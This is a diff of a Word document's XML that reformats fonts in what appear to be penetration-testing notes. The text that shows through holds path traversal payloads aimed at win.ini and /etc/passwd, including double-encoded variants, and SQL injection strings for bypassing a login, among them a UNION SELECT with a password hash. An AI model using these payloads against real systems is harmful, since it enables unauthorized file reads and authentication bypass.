-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>win.ini</w:t>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Path:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -454,329 +2216,67 @@
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>URL:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>static/%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>255c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>win.ini</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>injection:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>a UNION select 123</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>admin' OR '1'='1' -- -</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>login?file</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=../../../../etc/passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -784,336 +2284,1448 @@
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-pds"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-s"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> AND 1=0 UNION ALL SELECT </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-pds"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-pds"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-s"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-pds"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>161ebd7d45089b3446ee4e0d86dbcf92</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-pds"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-s"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="0A3069"/>
-        </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>win.ini</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SEARCH:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>static/%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
